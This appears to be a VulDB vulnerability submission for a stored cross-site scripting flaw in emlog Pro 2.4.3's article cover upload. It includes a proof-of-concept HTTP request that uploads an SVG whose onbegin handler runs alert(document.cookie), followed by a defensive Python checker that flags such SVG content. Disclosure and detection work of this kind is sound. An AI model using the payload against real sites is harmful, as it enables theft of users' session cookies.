Submit #468753: emlog Emlog Pro 2.4.3 Cross-Site Scripting (XSS)

Title: emlog Emlog Pro 2.4.3 Cross-Site Scripting (XSS)

Description:

Summary

An XSS vulnerability has been discovered in emlog pro 2.4.3. The vulnerability stems from the fact that /admin/article.php does not filter malicious SVG files. This vulnerability allows an attacker with content editing permissions to exploit the system by uploading an SVG file containing malicious XML code as the cover image for an article.

Details

The vulnerability exists in the article cover image upload functionality. Attackers can upload an SVG file that contains malicious XML code.

POC

POST /admin/article.php?action=upload_cover HTTP/1.1
Host: target-ip
Content-Length: 1116
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBXHN1jTPmYb3jbAq
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: [users'cookie]
Connection: keep-alive

------WebKitFormBoundaryBXHN1jTPmYb3jbAq
Content-Disposition: form-data; name="image"; filename="alert.svg"
Content-Type: image/svg+xml

<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 128 128">
<path fill="#D26383" d="M115.4 30.7L67.1 2.9c-.8-.5-1.9-.7-3.1-.7-1.2 0-2.3.3-3.1.7l-48 27.9c-1.7 1-2.9 3.5-2.9 5.4v55.7c0 1.1.2 2.4 1 3.5l106.8-62c-.6-1.2-1.5-2.1-2.4-2.7z" />
<path fill="#9C033A" d="M10.7 95.3c.5.8 1.2 1.5 1.9 1.9l48.2 27.9c.8.5 1.9.7 3.1.7 1.2 0 2.3-.3 3.1-.7l48-27.9c1.7-1 2.9-3.5 2.9-5.4V36.1c0-.9-.1-1.9-.6-2.8l-106.6 62z" />
<path fill="#fff" d="M85.3 76.1C81.1 83.5 73.1 88.5 64 88.5c-13.5 0-24.5-11-24.5-24.5s11-24.5 24.5-24.5c9.1 0 17.1 5 21.3 12.5l13-7.5c-6.8-11.9-19.6-20-34.3-20-21.8 0-39.5 17.7-39.5 39.5s17.7 39.5 39.5 39.5c14.6 0 27.4-8 34.2-19.8l-12.9-7.6z" />
<path d="M82.1 61.8h5.2v-5.3h4.4v5.3H97v4.4h-5.3v5.2h-4.4v-5.2h-5.2v-4.4zm18.5 0h5.2v-5.3h4.4v5.3h5.3v4.4h-5.3v5.2h-4.4v-5.2h-5.2v-4.4z" fill="#fff" />
<animate onbegin="alert(document.cookie)"></animate>
</svg>
------WebKitFormBoundaryBXHN1jTPmYb3jbAq--

Source: ⚠️ https://github.com/emlog/emlog/issues/312
User: jiashenghe (UID 39445)
Submission: 25.12.2024 07:38 (1 year ago)
Moderation: 04.01.2025 10:53 (10 days later)
Status: Accepted
VulDB Entry: 290214 [Emlog Pro up to 2.4.3 Cover Upload article.php?action=upload_cover image Cross Site Scripting]
Points: 20
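
A server-side check that would flag the SVG in the POC above, as an added example (not emlog's code or its fix). The function name `svg_findings` and the sample inputs are constructed for illustration, and the upload handler is assumed to call it on the raw file bytes and reject the upload when the list is non-empty.

```python
import re
import xml.etree.ElementTree as ET

# Elements that execute script or embed arbitrary HTML inside an SVG.
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "object", "embed"}

def local(name):
    """Drop the '{namespace}' prefix ElementTree adds to names; lowercase it."""
    return name.rsplit("}", 1)[-1].lower()

def svg_findings(data):
    """Return reasons the uploaded bytes are unsafe to serve as an SVG image."""
    try:
        text = data.decode("utf-8")      # refuse other encodings outright
    except UnicodeDecodeError:
        return ["not UTF-8"]
    if re.search(r"<!(DOCTYPE|ENTITY)", text, re.I):
        return ["DOCTYPE/ENTITY declaration"]   # no DTDs in a cover image
    try:
        root = ET.fromstring(text)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings = []
    if local(root.tag) != "svg":
        findings.append("root element is not <svg>")
    for el in root.iter():
        tag = local(el.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"active element <{tag}>")
        for name, value in el.attrib.items():
            attr = local(name)
            # onload, onclick, and SMIL handlers such as onbegin/onend/onrepeat
            if attr.startswith("on"):
                findings.append(f"event handler {attr} on <{tag}>")
            # browsers ignore whitespace/control characters inside the scheme
            if "javascript:" in re.sub(r"[\x00-\x20]", "", value).lower():
                findings.append(f"javascript: URL in {attr} on <{tag}>")
    return findings

# Constructed samples: same shape as the POC, handler body replaced by a stub.
SAMPLE_ACTIVE = (b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 8 8">'
                 b'<path d="M0 0h8v8z"/><animate onbegin="stub()"></animate></svg>')
SAMPLE_CLEAN = (b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 8 8">'
                b'<path fill="#fff" d="M0 0h8v8z"/></svg>')

if __name__ == "__main__":
    for label, blob in (("active", SAMPLE_ACTIVE), ("clean", SAMPLE_CLEAN)):
        print(label, svg_findings(blob) or "no findings")
```

A denylist like this is easy to leave incomplete, so it works best alongside serving uploaded files with `Content-Security-Policy: script-src 'none'` or re-encoding cover images to a raster format.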